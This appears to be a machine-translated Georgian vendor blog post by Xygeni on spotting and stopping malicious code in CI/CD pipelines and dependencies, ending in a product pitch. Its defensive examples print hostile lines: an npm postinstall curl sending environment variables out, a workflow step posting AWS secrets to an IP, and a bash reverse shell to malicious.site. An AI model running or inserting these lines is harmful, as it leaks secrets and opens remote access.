ქვემოთ ჩამოთვლილთაგან რომელი შეიძლება მიუთითებდეს მავნე კოდის შეტევაზე - როგორ შეიძლება მავნე კოდის გავრცელება

ქვემოთ ჩამოთვლილთაგან რომელი შეიძლება მიუთითებდეს მავნე კოდის შეტევაზე?

თუ თქვენ მუშაობთ CI/CD pipelineავტომატიზაციის სკრიპტების წერის ან თანამედროვე აწყობის სისტემების უსაფრთხოების უზრუნველყოფის შემთხვევაში, მავნე კოდის აღმოჩენა არ არის არჩევითი; ის კრიტიკულად მნიშვნელოვანია. მავნე კოდის შეტევები არა მხოლოდ თქვენი გაშვების დროს იყენებს; ისინი იარაღად აქცევს აწყობის ეტაპებს, მესამე მხარის პაკეტებს და ავტომატიზაციის სამუშაოებს, რომლებზეც ყოველდღიურად ხართ დამოკიდებული.

ეს სტატია იკვლევს, თუ რომელი ქცევები შეიძლება მიუთითებდეს მავნე კოდის შეტევაზე და როგორ შეიძლება გავრცელდეს მავნე კოდი, განსაკუთრებით... CI/CD გარემოში. ის შექმნილია დეველოპერებისა და DevSecOps გუნდებისთვის, რომლებიც პასუხისმგებელნი არიან პროგრამული უზრუნველყოფის მიწოდების ჯაჭვებზე, ავტომატიზაციის შექმნასა და უსაფრთხო განლაგების სამუშაო პროცესებზე. ამ ინდიკატორებისა და შეტევის ვექტორების გაგებით, გუნდებს შეუძლიათ უკეთ აღმოაჩინონ საფრთხეები და გააძლიერონ თავიანთი pipelineკომპრომისის წინააღმდეგია.

თქვენ ისწავლით როგორ ნერგავენ თავდამსხმელები საფრთხეებს თქვენს... pipelines, რა სიმპტომებს უნდა მიაქციოთ ყურადღება და როგორ შეიძლება მავნე კოდი ჩუმად გავრცელდეს რუტინული ამოცანების მეშვეობით, როგორიცაა დამოკიდებულებების ინსტალაცია და სამუშაო პროცესის ავტომატიზაცია. მოდით, განვიხილოთ სიგნალები, მოულოდნელი გამავალი ტრაფიკიდან დაწყებული, CI დავალებებში ჩარევით გამოწვეული თაღლითური PR-ებით დამთავრებული, რათა შეძლოთ საფრთხეების აღმოჩენა და ნეიტრალიზება მათ წარმოებაში მოხვედრამდე.

რა არის მავნე კოდის შეტევა?

მავნე კოდის შეტევა არის მაშინ, როდესაც თქვენს აპლიკაციაში, build-ში, მავნე კოდი სრულდება. pipeline, ან გაშვების გარემო. ჩვენ ვსაუბრობთ ლოგიკაზე, რომელიც სპეციალურად დაწერილია:

  • მოიპარეთ საიდუმლოებები, როგორიცაა API გასაღებები და ავტორიზაციის მონაცემები
  • კონსტრუქციების შეცვლა ან ინფიცირებული არტეფაქტების გადატანა
  • გახსენით გარსები ან ამოიღეთ მონაცემები

მავნე კოდი უბრალოდ შეცდომა არ არის. ის განზრახულია და ხშირად თქვენს ჩვეულებრივ ინსტრუმენტებშია: დამოკიდებულებები, CI დავალებები, ინსტალაციის სკრიპტები.

რატომ უნდა ადარდებდეს ეს დეველოპერებს? რადგან საფრთხე ყოველთვის არ მოდის გარე თავდამსხმელებისგან, რომლებიც თქვენს API-ებს აზიანებენ. მავნე კოდი იმპულსებს ყოველდღიურად გაშვებული სამუშაო პროცესების დროს, როგორიცაა npm ინსტალაცია ან Docker-ის აწყობა. ზუსტად ასე შეიძლება გავრცელდეს მავნე კოდი რეალურ სამყაროში.

ქვემოთ ჩამოთვლილთაგან რომელი შეიძლება მიუთითებდეს მავნე კოდის შეტევაზე? პრაქტიკული ნიშნები დეველოპერებისთვის

თუ გაინტერესებთ, ქვემოთ ჩამოთვლილთაგან რომელი შეიძლება მიუთითებდეს მავნე კოდის შეტევაზე, პასუხი იწყება დაკვირვებადი ქცევით:

ინდიკატორი (სიმპტომი)მაგალითიᲫირეული მიზეზიტიპი
მოულოდნელი გამავალი ტრაფიკი კონსტრუქციებიდანcurl -X POST http://198.51.100.42 -d "$(env)" ინსტალაციის შემდგომი სკრიპტიმავნე npm პაკეტინამდვილი ინდიკატორი
წყაროს საცავებში შეცვლილი ან დაბინდული ფაილებიდაბნეული ბაზა 64 ინჩი .github/workflows/build.ymlმიწოდების ჯაჭვის კომპრომისინამდვილი ინდიკატორი
მოულოდნელი სამუშაოების მიერ მოპოვებული საიდუმლოებებიდაუმტკიცებელი CI დავალების გამოყენება ${{ secrets.AWS_SECRET_KEY }}IAM-ის არასწორი კონფიგურაცია ან ინექციანამდვილი ინდიკატორი
შებრუნებული shell ან wget პროცესი აწყობაშიbash -i >& /dev/tcp/... shellcode CI საფეხურზეგაყალბებული pipeline scriptნამდვილი ინდიკატორი
Typosquatted პაკეტი ინსტალაციის სკრიპტითlodashs or react-core-js მოულოდნელი კოდის გაშვებადამოკიდებულების დაბნეულობანამდვილი ინდიკატორი
გახსნილია CI/CD უფლებებიყველა სამუშაო ადგილს შეუძლია წვდომა ყველა საიდუმლოებაზესუსტი ნაგულისხმევი კონფიგურაციებიცუდი პრაქტიკა (არ არის სიგნალი)
ფაილის მთლიანობის შემოწმების ნაკლებობაკონფიგურაციის ცვლილებისას შეტყობინებები არ არისმონიტორინგი არ არისცუდი პრაქტიკა (არ არის სიგნალი)

მოულოდნელი გამავალი ქსელური ტრაფიკი Build-დან Pipelines

სიმპტომები: თქვენი CI დავალებები მოულოდნელად დაუკავშირდება უცნობ გარე IP მისამართებს ან დომენებს.
მაგალითი: კომპრომეტირებული ინსტალაციის შემდგომი სკრიპტი იყენებს curl-ს გარემოს ცვლადების 198.51.100.42-ზე გასაგზავნად.

				
					{
  "scripts": {
    "postinstall": "curl -X POST http://198.51.100.42 -d \"$(env)\""
  }
}

				
			

Ძირეული მიზეზი: package.json-ს დაემატა მავნე npm დამოკიდებულება ან შეცვლილი CI სკრიპტი.
ტიპი: ნამდვილი ინდიკატორი
როგორ ავიცილოთ თავიდან:

  • გამავალი ტრაფიკის ნაგულისხმევად დაბლოკვა თქვენს CI მორბენლებში (მაგ., გამოიყენეთ firewall-ის წესები ან გამავალი ტრაფიკის დევნის ნაგულისხმევად გამოყენების პოლიტიკა)

  • დაამატეთ ქსელის პოლიტიკა, რომელიც მხოლოდ კონკრეტულ დომენებზე წვდომას დაუშვებს:

				
					jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Allowlist specific domains
        run: iptables -A OUTPUT -p tcp -d github.com -j ACCEPT
				
			

წყაროს საცავებში შეცვლილი ან მოულოდნელი ფაილები

სიმპტომები: ახალი ფაილები ან სკრიპტები წყაროს კონტროლში ჩნდება მკაფიო ახსნის გარეშე.
მაგალითი: დაბნეული Base64 დატვირთვა ჩატვირთულია package-lock.json-ში ან .github/workflows/build.yml-ში

				
					jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Unauthorized secret access
        run: echo ${{ secrets.AWS_SECRET_KEY }} | curl -X POST http://198.51.100.99
				
			

Ძირეული მიზეზი: მიწოდების ჯაჭვის კომპრომეტირება მავნე PR-ების ან დამოკიდებულებების გაყალბების გზით.
ტიპი: ნამდვილი ინდიკატორი
როგორ ავიცილოთ თავიდან:

  • გამოიყენეთ ფაილის მთლიანობის ავტომატური მონიტორინგი (მაგ., Tripwire ან Git) hooks ჩეკის ჯამის შემოწმებებით)

  • სამუშაო პროცესის ხელით განხილვის აღსრულება და ფაილის ცვლილებების დაბლოკვა GitHub-ის გამოყენებით. CODEOWNERS:

				
					.github/workflows/*  @security-team
package-lock.json     @devops-lead
				
			
  • განახლებული დამოკიდებულებების საკონტროლო ჯამების გადამოწმება

უჩვეულო ავტორიზაციის გამოყენების ნიმუშები

სიმპტომები: საიდუმლოებებზე წვდომას ახორციელებენ თქვენი სისტემის მოულოდნელი მომხმარებლები, სერვისები ან ეტაპები. pipeline.
მაგალითი: Secrets Manager-ის ჟურნალები აჩვენებს წვდომას ისეთი დავალებიდან, რომელსაც წვდომა არ უნდა ჰქონდეს.

				
					jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Unauthorized secret access
        run: echo ${{ secrets.AWS_SECRET_KEY }} | curl -X POST http://198.51.100.99
				
			
  • Ძირეული მიზეზი: არასწორად კონფიგურირებული IAM პოლიტიკა, გაჟონილი ავტორიზაციის მონაცემები ან CI დავალების ინექცია.
    ტიპი: ნამდვილი ინდიკატორი
    როგორ ავიცილოთ თავიდან:

    • წვდომის პოლიტიკაში მინიმალური პრივილეგიების აღსრულება (მაგ., ერთი სამუშაო = ერთი საიდუმლო)

    • საიდუმლო წვდომის ჟურნალების მონიტორინგი და ანომალიური გამოყენების შემთხვევაში შეტყობინებების დაყენება

    • გამოიყენეთ GitHub-ის გარემოს დაცვის წესები და ფარგლების საიდუმლოებები:

				
					environments:
  production:
    protection_rules:
      required_reviewers:
        - security-team
				
			
  • მოსალოდნელი სამუშაო ქცევის დადასტურება ავტომატური პოლიტიკის შემოწმების გამოყენებით (მაგ., OPA/Gatekeeper)

ანომალიური პროცესის შესრულება CI/CD ან გაშვების დრო

სიმპტომები: აპლიკაციების შექმნა ან განთავსება მოულოდნელ პროცესებს იწყებს.
მაგალითი: bash -c \"wget http://malicious.site/payload.sh\" ჩნდება შექმნის დროს.

				
					steps:
  - name: Suspicious shell execution
    run: bash -i >& /dev/tcp/malicious.site/4444 0>&1
				
			
  • Ძირეული მიზეზი: ინექციური სკრიპტები, უკუ გარსები ან მანიპულირებული pipeline ნაბიჯები.
    ტიპი: ნამდვილი ინდიკატორი
    როგორ ავიცილოთ თავიდან:

    • გამოიყენეთ დაშვებულთა სიები ბრძანებებისთვის (მაგ., შეზღუდეთ მხოლოდ დამტკიცებული აწყობის ხელსაწყოებით)

    • CI-ში პროცესის შესაძლებლობების დაბლოკვა მინიმალურ კონტეინერებში დავალებების შესრულებით:

				
					jobs:
  build:
    container:
      image: secure-ci-image:latest
      options: --cap-drop=ALL --no-new-privileges
				
			
  • CI-ინტეგრირებული ლინტერების გამოყენებით, შეამოწმეთ გარსის გამოყენება და ცნობილი არასწორი ნიმუშები. SAST

კომპრომეტირებული დამოკიდებულებები, რომლებიც ასრულებენ მავნე კოდს

სიმპტომები: ინსტალაციის სკრიპტები ან განახლებები თქვენი განზრახვის გარეშე არაავტორიზებული კოდის გაშვებას ახდენს.
მაგალითი: ტიპოსკოპული პაკეტი, როგორიცაა lodashs or react-core-js აწარმოებს მავნე წინასწარი ინსტალაციის კაუჭს.
Ძირეული მიზეზი: დამოკიდებულების დაბნეულობა ან არასანდო რეესტრების გამოყენება.
ტიპი: ნამდვილი ინდიკატორი
როგორ ავიცილოთ თავიდან:

  • დამოკიდებულებების დაბლოკვა SBOM ვალიდაცია და ჰეშის პინირება:

				
					npm ci --prefer-offline --no-audit --ignore-scripts
				
			
  • გამოყენება .npmrc or .yarnrc.yml დამტკიცებული რეესტრების თეთრ სიაში შესატანად:

				
					registry=https://registry.npmjs.org/
always-auth=true
				
			
  • პაკეტების მუდმივი აუდიტი SCA ისეთი ინსტრუმენტები, როგორიცაა Xygeni, OSV-Scanner ან Dependabot

აღმოაჩინეთ საუკეთესო ღია კოდის მავნე პროგრამებისგან დაცვა

დაიცავით თქვენი ღია კოდის პროგრამული უზრუნველყოფა ახალი საფრთხეებისგან!

დაკავშირებული წაკითხული:

როგორ შეიძლება მავნე კოდის გავრცელება დეველოპერის სამუშაო პროცესებში?

მავნე კოდის გავრცელების გზების გაგება დაგეხმარებათ მისი წარმოების დაწყებამდე მისი შეჩერებაში:

  • კომპრომეტირებული ღია კოდის პაკეტები (მაგ., ინფიცირებული npm/PyPI მოდულები)
  • მუქარის pull requests სამუშაო პროცესებში ფარული დატვირთვებით
  • CI/CD არასწორი კონფიგურაციები (მაგ., დაუდასტურებელი PR-ები ასრულებენ დავალებებს)
  • შიდა საფრთხეები ნორმალური განვითარების დროს უკანა კარებს ნერგავენ

ეს ყველაფერი იმის ვექტორებია, თუ როგორ შეიძლება მავნე კოდის გავრცელება ტრადიციული შეტყობინებების გააქტიურების გარეშე.

როგორ ამოვიცნოთ და თავიდან ავიცილოთ მავნე კოდი Pipelines და კოდების ბაზები

მავნე კოდის ინდიკატორების სწრაფი აღმოჩენის საკონტროლო სია

ქცევაგამოვლენის ინსტრუმენტიCI/CD Tip
მოულოდნელი ქსელის მოთხოვნებიქცევითი მონიტორინგი, გასვლის ჟურნალებიIP მისამართების დენილისტი, აუდიტი curl/wget გამოყენების შესახებ
YAML ან lock ფაილის ხელყოფაფაილის მთლიანობის თვალყურის დევნება, Git განსხვავებებიCODEOWNERS-ის აღსრულება, ძირითადი ფაილის ცვლილებების შესახებ გაფრთხილება
უჩვეულო საიდუმლო წვდომასაიდუმლო წვდომის ჟურნალები, IAM შეტყობინებებიგამოიყენეთ ფარგლების მქონე საიდუმლოებები, აღასრულეთ მინიმალური პრივილეგიები
შელის შესრულება ან შებრუნებული შელებიSAST, დაშვებულთა სიის სკანირებააწყობის სკრიპტებში shell-ის გამოყენების შეზღუდვა
საეჭვო დამოკიდებულებებიSCA, SBOM დადასტურებაგამოიყენეთ ჩაკეტილი ჰეშები და სანდო რეესტრები

ნუ დაელოდებით წარმოების შეტყობინებებს. აი, როგორ შეუძლიათ დეველოპერებს და DevSecOps გუნდებს პროაქტიულად აღმოაჩინონ მავნე კოდის შეტევა:

  • ქცევითი მონიტორინგი: უჩვეულო პროცესის შესრულების, ქსელის გამოძახებების ან ფაილის ცვლილებების დაფიქსირება CI/CD.
  • დამოკიდებულების კონტროლი: გამოყენება SBOMდა მკაცრი დაშვებულთა სიები დაუდასტურებელი ბიბლიოთეკების დაბლოკვისთვის.
  • ფაილის მთლიანობის თვალყურის დევნება: არაავტორიზებული სკრიპტების ან კონფიგურაციის ფაილის ცვლილებების აღმოჩენა.
  • გასასვლელი შეზღუდვები: გამავალი ტრაფიკის ანალიზითა და დაბლოკვით, თავიდან აიცილეთ აწყობის დროს ექსფილტრაცია.
  • სტატიკური და დინამიური ანალიზი: თქვენს სისტემაში საეჭვო ლოგიკის, გარსის გამოძახებების ან კოდირების შემოწმების ავტომატიზაცია pipelines.

Უფრო კონკრეტულად:

  • სტატიკური აპლიკაციის უსაფრთხოების ტესტირება (SAST): შეუძლია მავნე ლოგიკის ან დაბინდული კოდის (მაგ., დამალული base64, საეჭვო shell-ის გამოძახებები) აღმოჩენა მის შესრულებამდე. ინტეგრირება SAST ინსტრუმენტები თქვენს CI/CD სამუშაო პროცესები ხელს უწყობს მაღალი რისკის მქონე ნიმუშების აღნიშვნას pull requests მდე commits.
  • პროგრამული უზრუნველყოფის შემადგენლობის ანალიზი (SCA): დამოკიდებულების მოგვარების პროცესში ახდენს ცნობილი დაუცველი ან მავნე პაკეტების იდენტიფიცირებას. SCA ინსტრუმენტები დაგეხმარებათ დაბლოკოთ typosquatted ან backdoored პაკეტები ინსტალაციის დროს, სანამ ისინი თქვენს გარემოში მოხვდებიან.

ეს ყველაფერი გვეხმარება კითხვაზე პასუხის გაცემაში: ქვემოთ ჩამოთვლილთაგან რომელი შეიძლება მიუთითებდეს მავნე კოდის შეტევაზე და რომელია უბრალოდ უცნაური ხმაური.

რეალური ინციდენტები, რომლებიდანაც დეველოპერებმა უნდა ისწავლონ

ჰიპოთეტური მსჯელობა არ გჭირდებათ; მავნე კოდის ეს შეტევები უკვე მოხდა და თითოეული მათგანი მნიშვნელოვან გაკვეთილებს გვთავაზობს:

  • Microsoft, Apple: დამოკიდებულებების დაბნეულობამ შემიპყრო, მოტყუებით საჯარო რეესტრებიდან შიდა პაკეტების ამოღება მომატყუეს.
    Takeaway: დამოკიდებულების დაბნეულობის თავიდან ასაცილებლად გამოიყენეთ კერძო რეესტრები და დააკონფიგურირეთ პაკეტის გარჩევადობის დიაპაზონი.
  • ua-პარსერი-js: პოპულარული npm პაკეტი გატეხეს კრიპტო მაინერების განსათავსებლად.
    Takeaway: გამოყენება SBOM ვალიდაცია და CI დამოკიდებულების დაფიქსირება დაუდასტურებელი პაკეტის განახლებების თავიდან ასაცილებლად.
  • ტიპოსკვოტინგი PyPI-ზე: მავნე პაკეტები, რომლებსაც ნამდვილის მსგავსი სახელები აქვთ (მაგ. urlib3) ინფორმაციის ქურდების გასავრცელებლად.
    Takeaway: ინტეგრირება SCA ინსტრუმენტები სახელის მსგავსი პაკეტების აღმოსაჩენად და ინსტალაციამდე დამოკიდებულებების დასადასტურებლად.
  • GitHub-ის PR-ები: თავდამსხმელებმა წარმოადგინეს PR-ები, რომლებიც ჩუმად ცვლიდნენ CI სამუშაო პროცესებს leak secrets.
    Takeaway: სამუშაო პროცესის ფაილებისთვის მკაცრი PR მიმოხილვების აღსრულება და CI კონფიგურაციის ცვლილებებისთვის კოდის მფლობელების გამოყენება.

თითოეული შემთხვევა აჩვენებს, თუ როგორ შეიძლება მავნე კოდის გავრცელება დეველოპერულ გარემოში წარმოებამდე და ხაზს უსვამს მის ადრეულ ეტაპზე შესაჩერებლად ქმედით პრაქტიკებს.

დასკვნა: დეველოპერები აკონტროლებენ წინა ხაზს მავნე კოდის წინააღმდეგ

მავნე კოდით შეტევა ყოველთვის არ ნიშნავს გარედან დარღვევას. ზოგჯერ, თავდამსხმელი თქვენს... node_modules, თქვენი პაკეტი-lock.json, ან შენი .github/workflows ფაილი.

ქვემოთ ჩამოთვლილთაგან რომელი შეიძლება მიუთითებდეს მავნე კოდის შეტევაზე? პასუხი იმ სიგნალებშია, რომლებსაც თქვენი კოდი და ინსტრუმენტები ყოველდღიურად გამოსცემენ.

ფლობდე შენს CI/CD. დააკვირდით თქვენს დამოკიდებულებას. მონიშნეთ უცნაური ქცევები. რაც უფრო ადრე აღმოაჩენთ, მით ნაკლებად ვრცელდება ის.

როგორ ეხმარება Xygeni მავნე კოდის შეტევების აღმოჩენასა და დაბლოკვას DevOps-ში

როდესაც მავნე პროგრამა ვრცელდება თქვენი პროგრამული უზრუნველყოფის მიწოდების ჯაჭვში, ხშირად უკვე გვიანია, სანამ ის წარმოებაში აღწევს. სწორედ ამიტომ არის აუცილებელი ადრეული, ავტომატური აღმოჩენა. Xygeni-ს ადრეული გაფრთხილების სისტემა შექმნილია მავნე პაკეტების დასაჭერად, სანამ ისინი თქვენს კოდის ბაზას დააინფიცირებენ, CI/CD pipelines, ან ღრუბლოვანი გარემო.

აი როგორ ქსიგენი აძლიერებს თქვენს დაცვას:

რეალურ დროში ადრეული გაფრთხილება ნულოვანი დღის მავნე პროგრამების წინააღმდეგ

ტრადიციული სკანერებისგან განსხვავებით, რომლებიც მხოლოდ CVE-ებზე არიან დამოკიდებული, Xygeni განუწყვეტლივ აკონტროლებს საჯარო რეესტრებს, როგორიცაა npm, PyPI, Maven და NuGet, საეჭვო ქცევისა და მეტამონაცემების ანომალიების აღმოსაჩენად. როგორც კი პაკეტი მავნე აქტივობის ნიშნებს აჩვენებს, ის მონიშნულია, კარანტინში გადადის და თქვენს ანგარიშში შესვლა იბლოკება. SDLC.

  • მავნე პროგრამას გამოქვეყნების მომენტში აღმოაჩენს
  • ავტომატურად ბლოკავს ნულოვანი დღის დატვირთვას და საეჭვო ინსტალაციას hooks
  • სწრაფი დახარისხებისთვის DevOps გუნდებს რეალურ დროში შეტყობინებებს უგზავნის

მავნე პროგრამებისგან დაცვა ჩაშენებულია DevOps-ის ყველა ეტაპზე

იქნება ეს ინსტალაციის შემდგომი სკრიპტის დაბინდული კოდი, გარდამავალ დამოკიდებულებაში დამალული კრიპტო-მოპარვის პროგრამა თუ ტროიანიზებული კონტეინერის გამოსახულება, Xygeni იყენებს მრავალშრიან მავნე პროგრამის აღმოჩენას კოდში, დამოკიდებულებებში და CI/CDდა IaC:

  • სტატიკური ანალიზი, რომელიც განლაგებამდე აღმოაჩენს უკანა კარებს, ტროიანებს და დაბინდულ დატვირთვას.
  • დამოკიდებულების firewall, რომელიც ბლოკავს ტროიანიზებულ პაკეტებს მავნე ინსტალაციის სკრიპტებით
  • CI/CD დაცვა, რომელიც ხელს უშლის თქვენს სისტემაში შებრუნებული ჭურვების და ბრძანების ინექციების თავიდან აცილებას. pipelines.

Guardrails და კარანტინი გავრცელების შესაჩერებლად

Xygeni არა მხოლოდ აღმოაჩენს მავნე პროგრამას, არამედ აჩერებს კიდეც მას. როდესაც კომპრომეტირებული პაკეტი აღმოჩენილია:

  • ის დაუყოვნებლივ კარანტინშია, რათა თავიდან იქნას აცილებული მშენებლობის დროს დაბინძურება.
  • თქვენი pipelines-ს შეუძლია ავტომატურად დაარღვიოს ბილდი Xygeni-ს კონფიგურირებადი უსაფრთხოების პოლიტიკის გამოყენებით.
  • დაზარალებული ვერსიები შავ სიაშია, თუნდაც შიდა ან კერძო რეესტრებიდან

გამოიკვლიეთ და იყავით ინფორმირებული

Xygeni უზრუნველყოფს მავნე პაკეტების სრულ აუდიტის კვალს და ისტორიულ ძიებას. თქვენ გეცოდინებათ:

  • როდესაც მუქარა გამოქვეყნდა
  • როგორ იქნა აღმოჩენილი
  • მიაღწია თუ არა ის თქვენი სისტემების რომელიმე ნაწილს

გარდა ამისა, დადასტურებული საფრთხეები საჯაროდ ქვეყნდება, რათა დავიცვათ ღია კოდის ფართო საზოგადოება და თავიდან ავიცილოთ მავნე პროგრამების ხელახლა გამოჩენა სახელის გადარქმეულ ან გაყოფილ პაკეტებში.

ნუ მისცემთ მავნე პროგრამას უფლებას, რომ გამოგეპაროთ

ფარული კრიპტო-მაინერებიდან დაწყებული, ბეჭდვითი შეცდომების მქონე ინფორმაციის მოპარვით დამთავრებული, მავნე კოდის შეტევები სწრაფად ვითარდებაXygeni-ს ადრეული გაფრთხილების სისტემა უზრუნველყოფს, რომ მავნე პროგრამა არასოდეს გაცდეს თქვენი დეველოპერის, შექმნის ან განლაგების ეტაპებს და რომ თქვენი გუნდი რეალურ დროში იყოს გაფრთხილებული და დაცული.

დაიწყეთ თქვენი უფასო საცდელი პერიოდი ახლავე და დაიცავით თქვენი DevOps pipeline შემდეგი თავდასხმის დაწყებამდე!

sca-tools-software-composition-analysis-tools
თქვენი პროგრამული უზრუნველყოფის რისკების პრიორიტეტიზაცია, გამოსწორება და დაცვა
მიიღეთ თქვენი უფასო ანგარიში.
საკრედიტო ბარათი არ არის საჭირო.

უზრუნველყავით თქვენი პროგრამული უზრუნველყოფის შემუშავება და მიწოდება

Xygeni Product Suite-თან ერთად